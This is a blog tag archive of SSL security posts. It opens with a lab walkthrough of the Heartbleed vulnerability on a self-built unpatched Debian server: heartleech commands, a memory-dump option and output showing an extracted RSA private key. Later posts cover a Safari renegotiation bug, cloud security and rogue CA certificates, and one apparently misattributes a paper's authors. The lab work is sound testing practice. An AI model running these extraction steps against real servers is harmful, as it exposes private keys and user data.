Tag Archives: SSL

Testing Heartbleed vulnerability

No fresh news, but I had been wanting to test the Heartbleed vulnerability for a while and just missed time.

I used the following quick setup:

  1. Debian 7.0 virtual machine as a vulnerable host
  2. Heartleech tool. There are many other tools around, but this one was suggested to me by a coworker, who used it successfully during a pentest.

Getting a vulnerable host in your own environment is not that trivial, as most OS have now been patched (including the installation ISO of supported versions).

In my quest, I ended up with Debian 7.0 (Debian 6.x are too old and actually do not suffer from the vulnerability).

To download an old and unpatched installation image of Debian, you need to use Jigdo. This tool will download all packages from the archive site of Debian and rebuild the ISO:

jigdo-lite ftp://cdimage.debian.org/cdimage/archive/7.0.0/i386/jigdo-dvd/debian-7.0.0-i386-DVD-1.jigdo

Then, create a virtual machine with no network card, to make sure that the installation process does not retrieve any patch.

Once the Debian virtual machine is set and running:

  1. Edit <code>/etc/apt/source.list</code> to comment out lines concerning security updates (keep only the DVD enabled)
  2. Add and configure a network card (<code>eth0</code>)
  3. Install Apache2
  4. Enable SSL: a2enmod ssl
  5. Enable the default SSL web pages: <code>e2ensite default-ssl</code>
  6. Open a browser to check that it all works at <code>https://hostname</code>

Using heartleech is incredibly fast and straightforward:

heartleech % ./heartleech 172.25.254.153 --autopwn
--- heartleech/1.0.0i ---
https://github.com/robertdavidgraham/heartleech
786648 bytes downloaded (6.293-mbps)
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr
4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t
VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K
ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX
[...]
ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs
o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B
3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe
k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT
3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw=
-----END RSA PRIVATE KEY-----

You can also dump the memory in a file:

./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test

To further look for interesting content with strings or any parsing tool (Yara?) of your choice.

It gives also an alternative method to retrieve the private key. First, download the public key from your browser to a file and apply it to the dump to look for the matching private key:

./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test
--- heartleech/1.0.0i ---
https://github.com/robertdavidgraham/heartleech
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr
4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t
VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K
ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX
[...]
ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs
o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B
3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe
k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT
3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw=
-----END RSA PRIVATE KEY-----

Neat!

You may check this page to get information on vulnerable versions and remediation.

CVE-2009-3555: Safari, fix reached Mountain Lion…

I haven’t investigated much (and I will not more), but since my upgrade to Mac OS 10.8 (Mountain Lion), Safari supports safe renegociation.

Meanwhile, I had received a laconic answer from Apple to my bug report saying that they “are aware of this issue”.

Note that Safari 6.0 on Lion did not (at least on my computer, if someone could confirm)… so same browser version, different OS, the system SSL library must have been – silently – updated.

Anyway, good move finally.

CVE-2009-3555: Safari not yet patched ???

The other day I was shocked to find this entry in my Apache logs:

[error] SSL Library Error: 336068931 error:14080143:SSL routines:SSL3_ACCEPT:unsafe legacy renegotiation disabled

It occurs appears when I try to use a SSL client certificate with Safari. Of course, authentication is broken as it just fails on an 403 error page.

So it seems that Safari is the last browser which was not patched against CVE-2009-3555 !

2009 !! At least, I quickly checked the other browsers I had around and they were fine: IE, Firefox, Chrome… I am having an issue with Opera also, but although I have not identified the problem yet, it seems unrelated (and does not throw the same error).

Note that I reported the issue to Apple, but I did not receive any answer. Silence on the wire.

Cloud in the security sky or should I see a psychologist?

The “cloud” is a buzz word that has been around for months. The marketing guys are pushing it so hard that every IT guy will hear of that at work soon or later.

Taking a decision whether to use it or not requires some deep knowledge, because if its pros are clear – you can count on the salesmen to get a great picture of it again and again, its cons are silenced.

Too bad, a major disadvantage is security. But guess what? The other day an “analyst” presenting his study about cloud computing just cleared out the issue in 3 words :

“Concerning the people who doubt of the security in the cloud, it is a typical psychological issue of theses persons fearing change or something new . There is really nothing concrete to worry about cloud security.”

Well, not sure I am going to see a psychologist. Of course the guy did not give any solid argument, so here we go.

In short, cloud computing expose to the Internet services that were, in normal conditions, always kept inside an internal network and behind peripheral protections.

Of course, these services offer authentication, but basically almost every traditional web attacks will work as usual. After all, we are talking about the same web portal, the same users, the same browsers, etc.

Let quickly summarize the potential threats: CSRF, XSS, phishing, SSL attacks (MiTM, certificate spoofing),  browser exploits and many more.

So really, it is not a question of being crazy, paranoid or reluctant to change. There are just many issues that don’t make the cloud useless but should incite to caution.

Cloud computing can be used for what it is good at (flexibility, convenience) but not to replace a datacenter. It should not be used if security is a concern.

Don’t listen to the salesman only, read what some specialists are saying. Here is a compilation of some interesting articles I found :

And last but not least, in case our favorite salesman keeps pushy:

But that’s not all. The same goes with “virtualization everywhere”, but that will be another topic…

Possible use of SSL rogue certificates for spying purposes

Recent work of security researchers on SSL MiTM attacks have shown how fragile the whole Internet security design could be.

But whereas some of these attacks concerns CA with insufficient security policies (md5 collisions) or some level of social engineering against the user (sslsniff), this paper alerts us on a more serious and stealth threat.

It explains brilliantly, providing us with real case scenarios, how a CA (probably under the authority of a government agency or a similar powerful organisation) can create a rogue certificate that will be silently trusted by our browsers.

The problem relies in the chain of trust : a root CA delegates trust to intermediate CA, which can at this point generate any “valid” certificate they want, even for a domain they shouldn’t sign.

Excerpt :

<< As an example, the Israeli government could compel StartCom, an Israeli CA to issue an intermediate CA certificate that falsely listed the country of the intermediate CA as the United States. This rogue intermediate CA would then be used to issue site certificates for subsequent surveillance activities. In this hypothetical scenario, let us imagine that the rogue CA issued a certificate for Bank Of America, whose actual certificate was issued by VeriSign in the United States. Were CertLock to simply evaluate the issuing CA’s country of the previously seen Bank of America certificate, and compare it to the issuing country of the rogue intermediate CA (falsely listed as the United States), CertLock would not detect the hijacking attempt. In order to detect such rogue intermediate CAs, a more thorough comparison must be conducted. >>

In such a case, no browser will ever send an alert, so even the most experienced and most paranoid users would be easily cheated. It makes it very easy for an agency to conduct a man-in-the-middle attack, sniffing all of the user activity.
So here is a need for an add-on.

As a Firefox user, I am using Certificate Patrol. It basically alerts the user whenever the certificate of a site changes. The inconvenience is that it requires a long learning period and it also generates quite a lot of false positive (when a certificate is renewed, for instance).

Adi Shamir and Phil Zimmerman, the author of the paper above, plan to publish a new add-on, Certlock. It will check carefully all the chain of trust for a certicate and send out an alert whenever a detail is incoherent, for instance when the country of the parent’s certificate is different from the country the rogue certificate is pretending to be.

I really hope Certlock is coming soon.

SSL/TLS RFC updated against CVE-2009-3555

A solution has been finally brought up to fix CVE-2009-3555 and the temporary solution that broke client authentication.

At least, the IETF agreed on a fix as Marsh Ray informs us, though it will still take some weeks for the whole validation process to complete.

Moreover, as it requires both the servers and the clients to be patched, it will take months before the patches can be applied and one can have a working client authentification architecture. The longest will be the client side, of course, so I feel sorry for those who have a large park to manage.

As far as I am concerned, fortunately, I will just have a few browsers that I manage directly to update. Anyway, still more patience is needed !